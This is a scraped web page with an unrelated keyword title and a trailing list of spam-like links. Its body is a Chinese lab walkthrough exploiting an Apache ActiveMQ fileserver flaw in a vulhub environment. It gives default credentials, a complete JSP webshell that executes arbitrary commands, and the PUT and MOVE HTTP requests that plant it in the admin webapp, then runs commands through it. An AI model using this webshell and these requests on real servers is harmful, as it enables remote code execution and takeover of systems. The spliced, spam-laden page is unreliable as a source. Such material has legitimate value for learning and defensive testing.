当前位置: 首页 > news >正文

微信手机网站搭建网站logo怎么做最清楚

微信手机网站搭建,网站logo怎么做最清楚,昆山高端网站建设,太原微信网站开发一.环境配置 腾讯云的ubuntu操作系统,已经安装有docker 和 vulhub 直接来到 启动环境docker-compose,要在root权限下运行。 docker-compose up -d 若出现等待时间过长的情况,请参考这篇文章http://t.csdnimg.cn/SYhbE 访问http://公网ip:8…

一.环境配置

腾讯云的ubuntu操作系统,已经安装有docker 和 vulhub

直接来到

启动环境docker-compose,要在root权限下运行。

docker-compose up -d

若出现等待时间过长的情况,请参考这篇文章http://t.csdnimg.cn/SYhbE

访问http://公网ip:8161

若访问成功则环境搭建成功。

二.漏洞复现

目录拼接admin,进行登录操作。默认账户密码为admin/admin。

访问以下目录,找到文件上传的地址。

http://公网ip:8161/admin/test/systemProperties.jsp

随便抓一个页面的包,我这里就抓刚刚查询目录那个页面的包。

写入webshell文件。

将报文转发到Repeater。

进入Repeater中的Header模块,修改报文第一行,并在报文最后添加木马。

返回Repeater中的Raw模块,点击Go发送报文。

PUT /fileserver/1.jsp HTTP/1.1
Host: 公网ip:8161
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=rveyn……………………
Connection: close<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

上传成功。

访问http://公网ip:8161/fileserver/1.jsp

发现上传成功,但没有解析

ActiveMQ Web控制台分为三个应用程序:admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。

利用MOVE,将木马文件移动到api或者admin,我这边是移动到了admin目录下

还是刚刚的报文,更该第一行和增加第三行。第三行的路径就是最开始查询到的目录。

MOVE /fileserver/1.jsp HTTP/1.1
Host: 公网ip:8161
Destination:file:///opt/activemq/webapps/admin/1.jsp
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=yts9……………………
Connection: close
Content-Length: 397<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

访问文件http://公网ip:8161/admin/1.jsp?cmd=ls

执行命令whoami

漏洞复现完成。

http://www.15wanjia.com/news/184540.html

相关文章:

  • 学做的网站基础蛋糕网站建设范围
  • 网站模板下载后怎么用搜索引擎官网
  • 网站管理文档怎么写山东省住房城乡建设厅门户网站
  • 嘉兴百度网站推广长治市建设局网站
  • 学院网站建设项目的成本计划书wordpress支持大数据处理
  • 网站构建专业网站公司
  • asp企业网站模板卫计网站建设工作计划
  • 东莞网站提升排名windows10php网站建设
  • 新开传奇网站发布站搜索引擎排名优化seo
  • 郑州网站优化平台wordpress文章分多列排
  • 电子网站开发技术包括华为手机网站建设策划方案
  • 网站开发有哪些软件网页设计与制作课程标准电子版
  • 站长工具综合查询官网东莞黄江做网站公司
  • 扬州天猫网站建设企业网站的建设目标有哪几种
  • 怎么在虚拟机中做网站wordpress设置版权
  • 泸州住房城乡建设局官方网站品牌网站制作公司
  • 有哪些建设网站公司荆州市做网站的
  • 国外 网站 设计试用网站建设
  • 给娃娃做衣服卖的网站wordpress+浏览人数
  • 虚拟主机怎么搭建网站虚拟商城网站搭建
  • 专注新乡网站建设重庆知名设计公司有哪些
  • 网站传送门怎么做少儿编程加盟哪个好
  • 12个 网站模板 管理网站分成推广怎么做
  • 外包做一个网站一般多少钱做动态的网站的参考资料有哪些
  • 中投中原建设有限公司官方网站企业网站建设有什么要求
  • 北京网站设计公司兴田德润简介关于建筑工程的网站
  • 济南高端网站制作公司低价自适应网站建设
  • 网站建设教程实训心得江苏专业网站制作
  • wordpress登录logo上海谷歌优化
  • 怎么退出建设银行网站手机商城系统哪个好